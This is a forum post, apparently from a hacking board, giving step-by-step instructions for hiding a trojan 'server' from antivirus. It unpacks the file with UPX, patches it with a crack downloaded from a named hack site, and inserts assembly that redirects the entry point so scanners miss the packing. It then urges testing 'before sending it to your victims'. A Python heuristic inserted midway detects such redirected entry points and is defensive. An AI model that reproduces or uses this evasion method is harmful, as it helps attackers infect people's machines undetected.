Step 1: Download UPX v1.25 from http://upx.sourceforge.net
Step 2: Decompress the server. (upx -d server.exe)
Step 3: Download Furtif_00's AWESOME crack to bypass the edit protection from http://ch.ti.hack.site.voila.fr/ProPatch.exe
Step 4: Apply the patch. (propatch server.exe)
Step 5: Repack the server with UPX. (upx -9 server.exe)
Step 6: Open server.exe in a disassembler and go to the address of the OEP (Entrypoint + Image Base = OEP). If you do not know what I am talking about, read about the PE file format first (and about assembly). You should see something like "60 pushad". Scroll down a few pages until you see plenty of "00 add [eax],al". At this address you write the following commands, which will prevent the antivirus systems from detecting that the file is UPX packed (and the AVs won't decode it in memory):
Quote:
push "address of the OEP" <== Patchaddress
push eax
pushfd
pushad
call "address of the next command (which is "retn 28")"
retn 28
inc ecx <==New program entrypoint
loop "Patchaddress"
(from governmentsecurity.org)
Step 7: Change the program's entry point to our new one in the PE header. You can do this with a hex editor or with some other tools.
Step 8: Scan the server (which should be undetectable now) and you had better test it before sending it to your victims.
This patch can be used for all other trojans too. (Skip the cracking step)
Enjoy your undetectable server!!
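A defender-side check for the entry-point change described in Steps 6 and 7, as an added example that is not part of the original post: it reads the PE header and, for a file with UPX-named sections, reports whether the entry point still begins with the stock "60 pushad". The function names and sample bytes are constructed for illustration, and the heuristic assumes the UPX section names were left intact.

```python
import struct

def parse_pe(data):
    """Return (entry_rva, sections) for a PE32 image held in bytes."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    pe = struct.unpack_from("<I", data, 0x3C)[0]          # e_lfanew
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsect, opt_size = struct.unpack_from("<H12xH", data, pe + 6)
    opt = pe + 24                                         # optional header
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    sections = []
    for i in range(nsect):
        name, vsize, vaddr, rsize, rptr = struct.unpack_from(
            "<8sIIII", data, opt + opt_size + 40 * i)
        sections.append((name.rstrip(b"\0").decode("ascii", "replace"),
                         vaddr, max(vsize, rsize), rptr))
    return entry_rva, sections

def check_upx_entry(data):
    """Classify the entry point of a file whose sections carry UPX names."""
    entry_rva, sections = parse_pe(data)
    if not any(name.startswith("UPX") for name, *_ in sections):
        return "not-upx"
    for _, vaddr, size, rptr in sections:
        off = rptr + entry_rva - vaddr
        if vaddr <= entry_rva < vaddr + size and off < len(data):
            # Stock UPX stub starts with 60 (pushad); anything else is suspicious.
            return "upx-stock-entry" if data[off] == 0x60 else "upx-entry-redirected"
    return "upx-entry-outside-file"

def build_sample(entry_rva, section=b"UPX1"):
    """Constructed header-only PE32 with one section; not a runnable program."""
    hdr = bytearray(0x200)
    hdr[0:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)
    hdr[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<HH12xHH", hdr, 0x44, 0x14C, 1, 0xE0, 0x102)
    struct.pack_into("<H", hdr, 0x58, 0x10B)              # PE32 magic
    struct.pack_into("<I", hdr, 0x68, entry_rva)          # AddressOfEntryPoint
    struct.pack_into("<8sIIII", hdr, 0x138, section, 0x200, 0x1000, 0x200, 0x200)
    body = bytearray(0x200)
    body[0] = 0x60        # RVA 0x1000: pushad, where the stock stub begins
    body[0x100] = 0x41    # RVA 0x1100: inc ecx, the kind of moved entry the post describes
    return bytes(hdr + body)

if __name__ == "__main__":
    for rva in (0x1000, 0x1100):
        print(hex(rva), check_upx_entry(build_sample(rva)))
```

A "upx-entry-redirected" result is a reason to unpack and scan the file rather than a verdict on its own.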
Has anyone tried it, did it work??? I don't want to try it myself (too lazy)
